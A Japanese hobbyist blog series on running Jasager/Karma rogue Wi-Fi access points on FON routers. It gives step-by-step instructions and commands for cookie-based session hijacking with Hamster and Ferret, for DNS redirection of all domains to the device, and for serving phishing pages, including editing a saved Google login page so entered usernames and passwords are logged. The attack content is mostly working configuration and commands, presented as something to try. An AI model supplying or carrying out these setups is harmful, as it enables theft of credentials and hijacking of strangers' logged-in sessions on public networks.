SSブログ

【Jasager #5 Hamster and Ferret でcookieを利用したセンション ハイジャック】 [Jasager]

下図の様な構成にした。中継ノート PC は、無線 AP と接続してインターネット接続している。
偽 AP の FON に接続したユーザは、中継ノート PC 経由でインターネット接続する。中継ノート PCでスニフィングが可能となる。
http://hak5.org/hack/session-hijacking-with-a-wifi-pineapple-in-windows

プレゼンテーション1
Jasager 入り FON に接続したユーザ PC が、ブラウザで、サイトにログイン時に送られる cookie 情報を Hamster and Ferret を実行した中継ノート PC で横取りする。
中継ノート PC では、このようにサイトを開くとログイン済みとなっている。

yahoo

中継ノート PC は、Windows 7 32bit。
Winpcapを入れておく。http://www.winpcap.org/
Windows 用 Hamster and Ferret は以下からダウンロードした。
http://erratasec.blogspot.com/2007/08/sidejacking-with-hamster_05.html

中継ノート PC は、無線 AP に接続した状態で、ローカルエリア接続とワイヤレスネットワーク接続を選び、右クリックしてをブリッジにした。これで有線とワイヤレスが中継される。

bridge

Jasager FON の設定は、ワイヤレスと有線をブリッジ接続にする。
/etc/config/network

config 'interface' 'loopback'
        option 'ifname' 'lo'
        option 'proto' 'static'
        option 'ipaddr' '127.0.0.1'
        option 'netmask' '255.0.0.0'

config 'interface' 'lan'
        option 'ifname' 'eth0'
        option 'type' 'bridge'
        option 'netmask' '255.255.255.0'
        option 'macaddr' ''
        option 'ip6addr' ''
        option 'ip6gw' ''
        option 'ipaddr' '192.168.0.200'
        option 'gateway' '192.168.0.1'
        option 'proto' 'static'
        option 'dns' '192.168.0.1'

192.168.0.1 は、AP の IP アドレス(図参照)。
このAPはdhcpサーバになっているので、Jasager FON は DHCP Off にする。
Jasager の karma を使う場合は、karma を ON にする。
【Jasager #4 Jasager の Karma】

中継ノート PCで、ダウンロードした hamster and ferret を 解凍し、コマンドプロンプトから ferret を実行する。

ferret –W でインターフェースを表示。
ferret –i <n> で cookie のスニフィングを開始。

fer

別のコマンドプロンプトで hamster を実行する。
ham

ブラウザのproxy設定を 127.0.0.1:3128 にする
prox

ブラウザで http://hamster にアクセスする。
ham2

ターゲットとなる PC を用意し、 Jasager FON に wifi 接続したら、ターゲット PC で、yahoo や google 等を開いてログインする。

中継 PC で、先ほどの http://hamster を再更新して、右フレームのターゲット PC のIPアドレスを選ぶ。
次に左のフレームから、サイトのURLを選択する。(http://www.yahoo.co.jp/)

ターゲット PC がセッション中であれば、中継 PC でも、ログインした状態でサイトが表示される。
yahoo

SSL 接続(https) は暗号通信なので当然表示されない。またターゲット PC がセッション中じゃないと、中継 PC でセッションハイジャックできないみたいだ。
今回使った Hamster and Ferret は、すでにver.2.0 が出ている。http://erratasec.blogspot.com/2009/03/hamster-20-and-ferret-20.html

jasager の設定(無線LANの常時有効化、webif のインストール)
http://www.nico-maas.de/wordpress/?p=405

http://hak5.org/hack/session-hijacking-with-a-wifi-pineapple-in-windows


【Jasager #4 Jasager の Karma】 [Jasager]

Jasager インストール直後の初期状態であっても Karma は動作する。
FONにJasagerインストール

image
このようにパソコンと、FON を LAN 接続して http://192.168.1.1:1471 で、Interface 及び Karma を ON にする。

image

Windows 7 パソコンで無線LANを ON にすると、このように SSID が表示された。

image

このパソコンは我が家の無線APが「ワイヤレスネットワークの管理」に登録されている。
Windows パソコンは、無線LANを ON にすると、登録されている SSIDの無線APをプローブする。
上の表示の一番上 JINBO は、我が家の無線 AP の SSID で、パソコンに登録済みの SSID だ。
Karma は、パソコンがプローブした SSID を自分のSSID に設定するので、Karma も JINBO を広報している(二番目)。
Karma は、近くにあるパソコンが登録している SSID で起動することで、だまして接続させる。

たぶん Jasager だけではスニフィングはできない。Jasager に接続したパソコンに、スニフィング用パソコン経由でインターネット接続させる等の追加設定が必要だ。

Jasager のインストールは、FON があれば簡単にできる。
【Jasager #1 Jasager のイ..


【Jasager #3 Jasager 入り FON の設定】 [Jasager]

Jasager のインストールは【Jasager #1 Jasager のイ..
Jasager に php4 などパッケージ追加は【Jasager #2 Jasager 入り..
追加したパッケージ

zlib_1.2.3-5_mips.ipk
libopenssl_0.9.8i-3.2_mips.ipk
php4_4.4.7-1_mips.ipk
php4-cgi_4.4.7-1_mips.ipk

パソコンからteraterm で ssh 接続して、無線LANを有効にする。

uci set wireless.wifi0.disabled=0
uci commit wireless && wifi

http://hak5.org/hack/auto-rickrolling-wifi-pineapple の First begin by download this package のリンクから zip ダウンロードする。

zip をパソコンで解凍して、WinSCP で Jasager の /tmp にアップロードする。
jasager に ssh 接続して、アップロードした dhcp, network, wireless を /etc/config に保存する。

cd /tmp
mv dhcp network wireless /etc/config/.

/etc/dnsmasq.conf にどのアドレスでもdnsが自分のIPアドレスを返す様に設定する。

touch /etc/dnsmasq.conf
echo “address=/#/192.168.1.1″ > /etc/dnsmasq.conf

/etc/init.d/jasager の iptable の行を#でコメントアウトする。
start() {……} の中に以下の行を追加する。

image

wlanconfig ath0 create wlandev wifi0 wlanmode master 2>&1 > /dev/null
iwpriv ath0 karma 1
brctl addif br-lan ath0
ifconfig eth0 up

次に、http://hak5.org/hack/pineapple-phishing に従って設定する。
Alternatively, everything required for this hack can be downloaded in this archive.のリンクからダウンロードしたファイルを winrar で解凍する。image
WinSCP で ダウンロードした www 内のファイルを jasager の /www にアップロードする。

jasager の /etc/httpd.conf に *.php:/usr/bin/php を追加する。

echo “*.php:/usr/bin/php” >> /etc/httpd.conf

jasager の /etc/php.ini に cgi.force_redirect 0 を追加する。

echo “cgi.force_redirect 0″ >> /etc/php.ini

最後にリブートする。

reboot

設定はここまで。
パソコンで、無線LANをオンにし、ssid “ricknet” に接続する。
facebook や twitter にアクセスすると、偽サイトのログイン画面が表示されるので、user/pass を入れてみると、/www/bitches.txt に入力した user/pass が記録されている。

bitches

偽サイトのコンテンツは facebook.html と twitter.html しか入ってない。
googleを作成するには
google アカウントログインページにアクセスして、chrome なら「名前を付けてページを保存」で「ウェブページ、完全」、ファイル名 google.html で保存する。
google.html と google.files を jasager の /www にアップロードする。

google.html の <form..> の action= を書き換える。

<form id="gaia_loginform" action="error.php" method="post">

<input …> も name= を以下のように書き換える。

<input type="text" name="name" id="Email" value="">

<input type="password" name="pass" id="Passwd">

/www/redirect.php に追加する。

if (strpos($ref, "google")) { header('Location: google.html'); }

 

fakegoogle

 


この広告は前回の更新から一定期間経過したブログに表示されています。更新すると自動で解除されます。